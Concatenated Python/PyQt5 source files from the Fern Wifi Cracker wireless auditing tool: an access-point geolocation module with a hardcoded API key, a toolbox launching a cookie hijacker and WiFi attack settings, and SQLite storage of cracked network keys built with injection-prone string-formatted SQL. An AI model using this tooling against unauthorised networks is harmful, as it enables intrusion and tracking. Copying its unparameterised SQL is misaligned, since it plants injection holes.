#-------------------------------------------------------------------------------
# Name:        Fern_Track
# Purpose:     Tracking geographical location of Access points using mac address
#
# Author:      Saviour Emmanuel Ekiko
#
# Created:     14/06/2011
# Copyright:   (c) Fern Wifi Cracker 2011
# Licence:     <GNU GPL v3>
#
#
#-------------------------------------------------------------------------------
# GNU GPL v3 Licence Summary:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.



import re
import json
import http.client as httplib

class Fern_Geolocation(object):
    def __init__(self):
        self.mac_address = str()

    def _fern_geo_access(self):
        geo_data = dict()
        api_key='{"version":"1.1.0","request_address":true,"wifi_towers":[{"mac_address":"%s","ssid":"","signal_strength":-50}]}'%(self.mac_address)
        api_data = httplib.HTTPConnection('www.google.com')
        api_data.request('POST','/loc/json',api_key)
        data_ = api_data.getresponse()
        if(data_):
            geo_data = json.loads(data_.read())
        return geo_data


    def get_fern_map(self):
        self._location_source = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html style="height:100%">
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
    <title>Google Maps</title>
    <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=false&amp;key=ABQIAAAAzr2EBOXUKnm_jVnk0OJI7xSosDVG8KKPE1-m51RBrvYughuyMxQ-i1QfUnH94QxWIa6N4U6MouMmBA" type="text/javascript"></script>
  </head>
  <body onload="initialize()" onunload="GUnload()" style="height:100%;margin:0">


    <div id="map" style="width: 100%; height: 100%;"></div>


    <script type="text/javascript">
    function initialize(){
        if (GBrowserIsCompatible()) {
	  var latitude = ''' + str(self.get_coordinates()[0]) + ''';
	  var longitude = ''' + str(self.get_coordinates()[1]) + ''';
          var map = new GMap2(document.getElementById("map"));
          map.setCenter(new GLatLng(latitude,longitude),18);

          map.setMapType(G_SATELLITE_MAP);
          map.setUIToDefault();
          map.enableRotation();

          var Icon = new GIcon(G_DEFAULT_ICON);
          Icon.iconSize = new GSize(40, 40);
          Icon.image = "http://google-maps-icons.googlecode.com/files/wifi-logo.png";

          var point = new GLatLng(latitude,longitude);

          markerOptions = { icon:Icon };
          map.addOverlay(new GMarker(point, markerOptions));
	   }
    }

    </script>
  </body>

</html>
'''
        return self._location_source



    def isValid_Mac(self,mac_address):
        hex_digits = re.compile('([0-9a-f]{2}:){5}[0-9a-f]{2}',re.IGNORECASE)
        if re.match(hex_digits,mac_address):
            return True
        else:
            return False


    def set_mac_address(self,mac_address):
        if self.isValid_Mac(mac_address):
            mac_process = str(mac_address).replace(':','-')
            self.mac_address = mac_process


    def get_coordinates(self):
        geo_data = self._fern_geo_access()
        longitude = float(geo_data['location']['longitude'])
        latitude = float(geo_data['location']['latitude'])
        return (latitude,longitude)


    def get_all_geoinfo(self):
        return self._fern_geo_access()


    def get_location(self):
        location_process = self._fern_geo_access()
        location_data = location_process['location']
        return location_data

    def get_address(self):
        geo_data = self._fern_geo_access()
        address = geo_data['location']['address']
        return address


# mac_address = 00:CA:C9:67:23:45
#
# mac_location = Fern_Geolocation()
#
# if mac_location.isValid_Mac(mac_address):
#   mac_location.set_mac_address(mac_address)
#
# mac_location.get_fern_map() // Returns html source with map info
#
# mac_location.get_coordinates() // Returns latitude and longitude




import os
from gui.main_window import font_size
from PyQt5 import QtCore, QtWidgets, QtGui

font_setting = font_size()


try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    _fromUtf8 = lambda s: s

class toolbox_win(object):
    def setupUi(self, toolbox_win):
        toolbox_win.setObjectName(_fromUtf8("toolbox_win"))
        toolbox_win.resize(736, 304)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/1295905972_tool_kit.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        toolbox_win.setWindowIcon(icon)
        self.verticalLayout_5 = QtWidgets.QVBoxLayout(toolbox_win)
        self.verticalLayout_5.setObjectName(_fromUtf8("verticalLayout_5"))
        self.groupBox_2 = QtWidgets.QGroupBox(toolbox_win)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.groupBox_2.setFont(font)
        self.groupBox_2.setObjectName(_fromUtf8("groupBox_2"))
        self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.groupBox_2)
        self.verticalLayout_9.setObjectName(_fromUtf8("verticalLayout_9"))
        self.verticalLayout_2 = QtWidgets.QVBoxLayout()
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        spacerItem = QtWidgets.QSpacerItem(11, 92, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout.addItem(spacerItem)
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        spacerItem1 = QtWidgets.QSpacerItem(190, 10, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout.addItem(spacerItem1)
        self.geotrack_button = QtWidgets.QPushButton(self.groupBox_2)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.geotrack_button.sizePolicy().hasHeightForWidth())
        self.geotrack_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.geotrack_button.setFont(font)
        icon1 = QtGui.QIcon()
        icon1.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/map.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.geotrack_button.setIcon(icon1)
        self.geotrack_button.setIconSize(QtCore.QSize(49, 49))
        self.geotrack_button.setObjectName(_fromUtf8("geotrack_button"))
        self.verticalLayout.addWidget(self.geotrack_button)
        self.horizontalLayout.addLayout(self.verticalLayout)
        self.horizontalLayout_2.addLayout(self.horizontalLayout)
        spacerItem2 = QtWidgets.QSpacerItem(78, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem2)
        self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
        spacerItem3 = QtWidgets.QSpacerItem(11, 92, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout_6.addItem(spacerItem3)
        self.verticalLayout_6 = QtWidgets.QVBoxLayout()
        self.verticalLayout_6.setObjectName(_fromUtf8("verticalLayout_6"))
        spacerItem4 = QtWidgets.QSpacerItem(190, 10, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_6.addItem(spacerItem4)
        self.cookie_hijack_button = QtWidgets.QPushButton(self.groupBox_2)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.cookie_hijack_button.sizePolicy().hasHeightForWidth())
        self.cookie_hijack_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.cookie_hijack_button.setFont(font)
        icon2 = QtGui.QIcon()
        icon2.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/cookies-icon.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.cookie_hijack_button.setIcon(icon2)
        self.cookie_hijack_button.setIconSize(QtCore.QSize(60, 60))
        self.cookie_hijack_button.setObjectName(_fromUtf8("cookie_hijack_button"))
        self.verticalLayout_6.addWidget(self.cookie_hijack_button)
        self.horizontalLayout_6.addLayout(self.verticalLayout_6)
        self.horizontalLayout_2.addLayout(self.horizontalLayout_6)
        spacerItem5 = QtWidgets.QSpacerItem(78, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem5)
        self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_8.setObjectName(_fromUtf8("horizontalLayout_8"))
        spacerItem6 = QtWidgets.QSpacerItem(11, 92, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout_8.addItem(spacerItem6)
        self.verticalLayout_8 = QtWidgets.QVBoxLayout()
        self.verticalLayout_8.setObjectName(_fromUtf8("verticalLayout_8"))
        spacerItem7 = QtWidgets.QSpacerItem(190, 10, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_8.addItem(spacerItem7)
        self.ray_fusion_button = QtWidgets.QPushButton(self.groupBox_2)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.ray_fusion_button.sizePolicy().hasHeightForWidth())
        self.ray_fusion_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.ray_fusion_button.setFont(font)
        icon3 = QtGui.QIcon()
        icon3.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/fusion.png" % (os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.ray_fusion_button.setIcon(icon3)
        self.ray_fusion_button.setIconSize(QtCore.QSize(60, 60))
        self.ray_fusion_button.setObjectName(_fromUtf8("ray_fusion_button"))
        self.verticalLayout_8.addWidget(self.ray_fusion_button)
        self.horizontalLayout_8.addLayout(self.verticalLayout_8)
        self.horizontalLayout_2.addLayout(self.horizontalLayout_8)
        self.verticalLayout_2.addLayout(self.horizontalLayout_2)
        spacerItem8 = QtWidgets.QSpacerItem(20, 28, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_2.addItem(spacerItem8)
        self.verticalLayout_9.addLayout(self.verticalLayout_2)
        self.verticalLayout_5.addWidget(self.groupBox_2)
        self.groupBox = QtWidgets.QGroupBox(toolbox_win)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.groupBox.sizePolicy().hasHeightForWidth())
        self.groupBox.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.groupBox.setFont(font)
        self.groupBox.setObjectName(_fromUtf8("groupBox"))
        self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.groupBox)
        self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
        self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        spacerItem9 = QtWidgets.QSpacerItem(20, 80, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout_3.addItem(spacerItem9)
        self.verticalLayout_3 = QtWidgets.QVBoxLayout()
        self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
        spacerItem10 = QtWidgets.QSpacerItem(158, 10, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_3.addItem(spacerItem10)
        self.pushButton = QtWidgets.QPushButton(self.groupBox)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.pushButton.sizePolicy().hasHeightForWidth())
        self.pushButton.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.pushButton.setFont(font)
        icon4 = QtGui.QIcon()
        icon4.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/1295906241_preferences-desktop-font.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.pushButton.setIcon(icon4)
        self.pushButton.setIconSize(QtCore.QSize(48, 49))
        self.pushButton.setObjectName(_fromUtf8("pushButton"))
        self.verticalLayout_3.addWidget(self.pushButton)
        self.horizontalLayout_3.addLayout(self.verticalLayout_3)
        self.horizontalLayout_5.addLayout(self.horizontalLayout_3)
        spacerItem11 = QtWidgets.QSpacerItem(63, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_5.addItem(spacerItem11)
        self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
        spacerItem12 = QtWidgets.QSpacerItem(20, 80, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout_4.addItem(spacerItem12)
        self.verticalLayout_4 = QtWidgets.QVBoxLayout()
        self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
        spacerItem13 = QtWidgets.QSpacerItem(158, 10, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_4.addItem(spacerItem13)
        self.attack_options_button = QtWidgets.QPushButton(self.groupBox)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.attack_options_button.sizePolicy().hasHeightForWidth())
        self.attack_options_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.attack_options_button.setFont(font)
        icon5 = QtGui.QIcon()
        icon5.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/wifi_4.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.attack_options_button.setIcon(icon5)
        self.attack_options_button.setIconSize(QtCore.QSize(48, 49))
        self.attack_options_button.setObjectName(_fromUtf8("attack_options_button"))
        self.verticalLayout_4.addWidget(self.attack_options_button)
        self.horizontalLayout_4.addLayout(self.verticalLayout_4)
        self.horizontalLayout_5.addLayout(self.horizontalLayout_4)
        spacerItem14 = QtWidgets.QSpacerItem(20, 28, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.horizontalLayout_5.addItem(spacerItem14)
        self.verticalLayout_5.addWidget(self.groupBox)
        spacerItem15 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_5.addItem(spacerItem15)

        self.retranslateUi(toolbox_win)
        QtCore.QMetaObject.connectSlotsByName(toolbox_win)

    def retranslateUi(self, toolbox_win):
        toolbox_win.setWindowTitle(QtWidgets.QApplication.translate("toolbox_win", "Fern - ToolBox", None, 0))
        self.groupBox_2.setTitle(QtWidgets.QApplication.translate("toolbox_win", "Features", None, 0))
        self.geotrack_button.setText(QtWidgets.QApplication.translate("toolbox_win", "Geolocatory Tracker", None, 0))
        self.cookie_hijack_button.setText(QtWidgets.QApplication.translate("toolbox_win", "Cookie Hijacker", None, 0))
        self.ray_fusion_button.setText(QtWidgets.QApplication.translate("toolbox_win", "Ray Fusion", None, 0))
        self.groupBox.setTitle(QtWidgets.QApplication.translate("toolbox_win", "General Settings", None, 0))
        self.pushButton.setText(QtWidgets.QApplication.translate("toolbox_win", "Font Settings", None, 0))
        self.attack_options_button.setText(QtWidgets.QApplication.translate("toolbox_win", "WIFI Attack Options", None, 0))




import os
import sqlite3
import threading

import tracker_core

from gui.geotrack import *
from core  import variables

from PyQt5 import QtCore, QtGui, QtWidgets

fern_map_access = tracker_core.Fern_Geolocation()

class Fern_geolocation_tracker(QtWidgets.QDialog,Ui_fern_geotrack):
    '''Main windows class'''
    network_timeout_signal = QtCore.pyqtSignal()
    display_map_signal = QtCore.pyqtSignal()

    def __init__(self):
        QtWidgets.QDialog.__init__(self)
        self.setupUi(self)
        self.retranslateUi(self)
        self.setWindowModality(QtCore.Qt.ApplicationModal)

        self.database_accesspoint = {}  # Holds all database accesspoint name and mac details
        self.idlelize_items()
        self.set_database_access_points()
        self.display_html(variables.html_instructions_message)

        self.database_radio.clicked.connect(self.set_database_mode)
        self.insert_mac_radio.clicked.connect(self.set_mac_mode)
        self.track_button.clicked.connect(self.launch_tracker)
        self.network_timeout_signal.connect(self.internet_connection_error)
        self.display_map_signal.connect(self.display_map)


    #
    # Database process methods
    #
    def database_items(self):
        ''' return list of database items'''
        database = sqlite3.connect(os.getcwd() + '/key-database/Database.db')
        database_connection = database.cursor()
        database_connection.execute('select * from keys')
        database_items = database_connection.fetchall()
        database.close()
        return database_items


    def set_database_access_points(self):
        ''' fill combobox with database accesspoint
            details
        '''
        if self.database_items():
            self.database_radio.setChecked(True)
            self.target_combo.setEditable(False)
            for data_ in self.database_items():
                if fern_map_access.isValid_Mac(data_[1]):
                    self.database_accesspoint[str(data_[0])] = str(data_[1])  # {'GLASS_HAWK':'0C:67:34:12:89:76'}
            self.target_combo.addItems(sorted(self.database_accesspoint.keys()))
        else:
            self.target_combo.setEditable(True)
            self.insert_mac_radio.setChecked(True)

    #
    # User option methods
    #
    def set_database_mode(self):
        ''' Change combo mode and insert database details'''
        if self.database_items():
            self.database_radio.setChecked(True)
            self.target_combo.setEditable(False)
            self.set_database_access_points()
        else:
            self.target_combo.setEditable(True)
            self.insert_mac_radio.setChecked(True)
            QtWidgets.QMessageBox.warning(self,'Empty Database entries',variables.database_null_error.strip('/n'))
            self.target_combo.setFocus()
            self.target_combo.clear()



    def set_mac_mode(self):
        ''' Change combo mode for manual mac-address insertion'''
        self.target_combo.setEditable(True)
        self.insert_mac_radio.setChecked(True)
        self.target_combo.setFocus()
        self.target_combo.clear()

    def get_unprocessed_mac(self):
        if self.database_radio.isChecked():
            access_point = str(self.target_combo.currentText())
            mac_address = self.database_accesspoint[access_point]
        else:
            mac_address = str(self.target_combo.currentText())
        return mac_address


    #
    # Fern Track initialization
    #
    def launch_tracker(self):
        ''' Evaluate user options and sets tracker class variables'''
        self.idlelize_items()
        self.display_html(str())
        if self.database_radio.isChecked():
            fern_map_access.set_mac_address(self.get_unprocessed_mac())
            self.track_button.setText('Tracking...')
            threading.Thread(target=self.display_tracking).start()
        else:
            if fern_map_access.isValid_Mac(self.get_unprocessed_mac()):
                fern_map_access.set_mac_address(self.get_unprocessed_mac())
                self.track_button.setText('Tracking...')
                threading.Thread(target=self.display_tracking).start()
            else:
                QtWidgets.QMessageBox.warning(self,'Invalid Mac Address',variables.invalid_mac_address_error.strip('/n'))
                self.display_html(variables.html_instructions_message)
                self.target_combo.setFocus()


    #
    # Map Display methods
    #
    def display_html(self,html):
        '''Displays map or error pages'''
        self.map_viewer.setHtml(html)


    def display_map(self):
        '''Set map display'''
        self.activate_items()
        self.display_html(fern_map_access.get_fern_map())


    def display_tracking(self):
        ''' Processes and displays map '''
        if int(variables.subprocess.getstatusoutput('ping www.google.com -c 3')[0]):
            self.network_timeout_signal.emit()
        else:
            self.display_map_signal.emit()

    #
    # Error display messages
    #
    def internet_connection_error(self):
        '''Displays Internet error messages'''
        self.idlelize_items()
        self.display_html(variables.html_network_timeout_error)


    #
    # Co-ordinate details
    #
    def idlelize_items(self):
        '''Set GUI objects to idle mode'''
        self.mac_address_label.setText("Mac Address:")
        self.country_label.setText("Country:")
        self.latitude_label.setText("Latitude:")
        self.city_label.setText("City: ")
        self.longitude_label.setText("Longitude:")
        self.street_label.setText("Street:")
        self.accuracy_label.setText("Accuracy:")
        self.country_code_label.setText("Country Code:")
        self.track_button.setText("Track")


    def activate_items(self):
        '''Active and fill GUI objects with details'''
        full_geo_details = fern_map_access.get_all_geoinfo()
        try:
            self.mac_address_label.setText("Mac Address: <font color=green><b>%s</b></font>"%\
                                            (self.get_unprocessed_mac()))
        except(KeyError):pass
        try:
            self.country_label.setText("Country: <font color=green><b>%s</b></font>"%\
                                        (full_geo_details['location']['address']['country']))
        except(KeyError):pass
        try:
            self.latitude_label.setText("Latitude: <font color=green><b>%s</b></font>"%\
                                        (full_geo_details['location']['latitude']))
        except(KeyError):pass
        try:
            self.city_label.setText("City: <font color=green><b>%s</b></font>"%\
                                        (full_geo_details['location']['address']['city']))
        except(KeyError):pass
        try:
            self.longitude_label.setText("Longitude: <font color=green><b>%s</b></font>"%\
                                        (full_geo_details['location']['longitude']))
        except(KeyError):pass
        try:
            self.street_label.setText("Street: <font color=green><b>%s</b></font>"%\
                                        (full_geo_details['location']['address']['street']))
        except(KeyError):pass
        try:
            self.accuracy_label.setText("Accuracy: <font color=green><b>%s</b></font>"%\
                                        (full_geo_details['location']['accuracy']))
        except(KeyError):pass
        try:
            self.country_code_label.setText("Country Code: <font color=green><b>%s</b></font>"%\
                                        (full_geo_details['location']['address']['country_code']))
        except(KeyError):pass
        try:
            self.track_button.setText("Track")
        except(KeyError):pass














from core import variables

from gui.tips import *
from gui.toolbox import *
from gui.settings import *
from gui.geotrack import *
from gui.font_settings import *
from core.variables import *
from core.functions import *
from gui.attack_settings import *
from core.settings import *
from core.toolbox import *
from gui.fern_pro_tip import *
from gui.toolbox import *
from core.toolbox.fern_ray_fusion import *


from PyQt5 import QtCore, QtGui, QtWidgets

#
# Tool Box window class
#
class tool_box_window(QtWidgets.QDialog,toolbox_win):
    def __init__(self):
        QtWidgets.QDialog.__init__(self)
        self.setupUi(self)
        self.retranslateUi(self)
        self.setWindowModality(QtCore.Qt.ApplicationModal)

        self.pushButton.clicked.connect(self.font_exec)
        self.geotrack_button.clicked.connect(self.geotrack_exec)
        self.attack_options_button.clicked.connect(self.attack_settings_exec)
        self.cookie_hijack_button.clicked.connect(self.cookie_hijack_exec)
        self.ray_fusion_button.clicked.connect(self.ray_fusion_exec)


    #
    #   TOOLBOX FEATURES
    #
    def geotrack_exec(self):
        QtWidgets.QMessageBox.warning(self,"Geo Tracker","This feature has been deprecated")


    def cookie_hijack_exec(self):
        try:
            import scapy
        except ImportError:
            QtWidgets.QMessageBox.warning(self,"Scapy Dependency","Scapy library is currently not installed \nPlease run \"pip install scapy\" to install the dependency")
            return

        cookie_hijacker = fern_cookie_hijacker.Fern_Cookie_Hijacker()
        cookie_hijacker.exec_()


    def ray_fusion_exec(self):
        ray_fusion = Ray_Fusion()
        ray_fusion.exec_()



    #
    #   SETTINGS
    #
    def font_exec(self):
        font_dialog_box = font_dialog()
        font_dialog_box.exec_()

    def attack_settings_exec(self):
        wifi_attack_settings_box = wifi_attack_settings()
        wifi_attack_settings_box.exec_()



################################################################################
#                                                                              #
#                             GENERAL SETTINGS                                 #
#                                                                              #
################################################################################

class font_dialog(QtWidgets.QDialog,font_dialog):
    def __init__(self):
        QtWidgets.QDialog.__init__(self)
        self.setupUi(self)
        self.retranslateUi(self)
        self.setWindowTitle('Font Settings')
        self.label_2.setText('Current Font: <font color=green><b>%s</b></font>'% \
                                (reader(os.getcwd() + '/.font_settings.dat' ).split()[2]))

        self.buttonBox.accepted.connect(self.set_font)

        font_range = []
        for font_numbers in range(1,21):
            font_range.append(str(font_numbers))
        self.comboBox.addItems(font_range)

    def set_font(self):
        if '.font_settings.dat' in os.listdir(os.getcwd()):
            os.remove('.font_settings.dat')
            choosen_font = self.comboBox.currentText()
            font_string  = 'font_size = %s'%(choosen_font)
            write('.font_settings.dat',font_string)

        self.close()
        QtWidgets.QMessageBox.information(self,'Font Settings','Please restart application to apply changes')




class wifi_attack_settings(QtWidgets.QDialog,Ui_attack_settings):
    def __init__(self):
        QtWidgets.QDialog.__init__(self)
        self.setupUi(self)
        self.retranslateUi(self)

        self.settings = Fern_settings()
        self.display_components()

        self.mac_button.clicked.connect(self.set_static_mac)
        self.mac_box.clicked.connect(self.remove_mac_objects)
        self.capture_box.clicked.connect(self.remove_capture_objects)
        self.direc_browse.clicked.connect(self.set_capture_directory)




    def display_components(self):
        if self.settings.setting_exists('capture_directory'):
            self.capture_box.setChecked(True)
            self.directory_label.setText('<font color=green><b>' + str(self.settings.read_last_settings('capture_directory')) + '</b></font>')
        if self.settings.setting_exists('mac_address'):
            self.mac_box.setChecked(True)
            self.mac_edit.setText(str(self.settings.read_last_settings('mac_address')))



    def set_static_mac(self):
        mac_address = str(self.mac_edit.text())
        if not Check_MAC(mac_address):
            QtWidgets.QMessageBox.warning(self,"Invalid MAC Address",variables.invalid_mac_address_error)
            self.mac_edit.setFocus()
        else:
            self.settings.create_settings('mac_address',mac_address)


    def set_capture_directory(self):
        directory = str(QtWidgets.QFileDialog.getExistingDirectory(self,"Select Capture Storage Directory",""))
        if directory:
            self.directory_label.setText('<font color=green><b>' + directory)
            self.settings.create_settings("capture_directory",directory)


    def remove_mac_objects(self):
        if not self.mac_box.isChecked():
            self.mac_edit.clear()
            self.settings.remove_settings('mac_address')


    def remove_capture_objects(self):
        if not self.capture_box.isChecked():
            self.directory_label.clear()
            self.settings.remove_settings('capture_directory')





################################################################################
#                                                                              #
#                    WEP ATTACK OPTIONAL SETTINGS                              #
#                                                                              #
################################################################################


#
# Tips Dialog, show user tips on how to access settings dialog and set scan preferences
#
class tips_window(QtWidgets.QDialog,tips_dialog):
    def __init__(self):
        QtWidgets.QDialog.__init__(self)
        self.setupUi(self)
        self.type = int()           # Type of tip display e.g tip from mainwindow = 1

        self.settings = Fern_settings()

        self.pushButton.clicked.connect(self.accept)

    def accept(self):
        check_status = self.checkBox.isChecked()

        if(self.type == 1):         # From Main Window
            if check_status == True:
                self.settings.create_settings("tips","1")
            else:
                self.settings.create_settings("tips","0")

        if(self.type == 2):
            if check_status == True:
                self.settings.create_settings("copy key tips","1")
            else:
                self.settings.create_settings("copy key tips","0")

        self.close()



class Fern_Pro_Tips(QtWidgets.QDialog,Fern_Pro_Tip_ui):
    def __init__(self):
        QtWidgets.QDialog.__init__(self)
        self.setupUi(self)

        self.settings = Fern_settings()

        self.yes_button.clicked.connect(self.open_website)
        self.show_message_checkbox.clicked.connect(self.toggle_tip)


    def open_website(self):
        QtGui.QDesktopServices.openUrl(QtCore.QUrl("http://www.fern-pro.com/"))
        self.toggle_tip()
        self.close()


    def toggle_tip(self):
        checked = self.show_message_checkbox.isChecked()
        if(checked):
            self.settings.create_settings("fern_pro_tips","1")
            return

        self.settings.create_settings("fern_pro_tips","0")





#Finished Here (tips_window)

#
# Class for the settings dialog box
#
class settings_dialog(QtWidgets.QDialog,settings):
    def __init__(self):
        QtWidgets.QDialog.__init__(self)

        self.settings = Fern_settings()

        self.setupUi(self)
        if len(variables.xterm_setting) > 0:
            self.xterm_checkbox.setChecked(True)

        self.label_4.setText("\t\t<font color=green>%s Activated</font>"%(variables.monitor_interface))

        list_ = ['All Channels']
        for list_numbers in range(1,15):
            list_.append(str(list_numbers))
        self.channel_combobox.addItems(list_)
        self.buttonBox.accepted.connect(self.change_settings)
        self.buttonBox.rejected.connect(self.close)


    #
    # Log selected temporary manual channel to fern-log directory
    #
    def change_settings(self):
        channel = str(self.channel_combobox.currentText())
        term_settings = self.xterm_checkbox.isChecked()

        if channel == 'All Channels':
            variables.static_channel = str()
        else:
            variables.static_channel = channel

        if term_settings:
            self.settings.create_settings("xterm","xterm -geometry 100 -e")
        else:
            self.settings.create_settings("xterm",str())
        variables.xterm_setting = self.settings.read_last_settings("xterm")





import os
import re
import sqlite3
import subprocess

################### DATABASE INSERTION FUNCTIONS ##############
#
# Create database if it does not exist
#
def database_create():
    temp = sqlite3.connect(os.getcwd() + '/key-database/Database.db')                 # Database File and Tables are created Here
    temp_query = temp.cursor()
    temp_query.execute('''create table if not exists keys \
                            (access_point text,mac_address text,encryption text,key text,channel int)''')
    temp.commit()
    temp.close()


#
# Add keys to Database with this function
#

def upgrade_database():
    connection = sqlite3.connect('key-database/Database.db')
    query = connection.cursor()
    query.execute("select * from keys")

    if(len(query.description) < 5):
        temp_backup = query.fetchall()
        query.execute("drop table keys")
        query.execute('''create table keys (access_point text,mac_address text,encryption text,key text,channel int)''')
        for values in temp_backup:
            query.execute("insert into keys values ('%s','%s','%s','%s','%s')"%(values[0],str(),values[1],values[2],values[3]))
    connection.commit()
    connection.close()



def set_key_entries(arg,arg1,arg2,arg3,arg4):
    upgrade_database()
    connection = sqlite3.connect('key-database/Database.db')
    query = connection.cursor()
    sql_code = "select key from keys where mac_address ='%s' and encryption = '%s'"
    query.execute(sql_code % (str(arg1),str(arg2)))
    result = query.fetchall()
    if(result):
        sql_code_2 = "update keys set access_point = '%s',encryption = '%s',key = '%s',channel = '%s' where mac_address = '%s'"
        query.execute(sql_code_2 % (str(arg),str(arg2),str(arg3),str(arg4),str(arg1)))
    else:
        query.execute("insert into keys values ('%s','%s','%s','%s','%s')"%(str(arg),str(arg1),str(arg2),str(arg3),str(arg4)))
    connection.commit()
    connection.close()



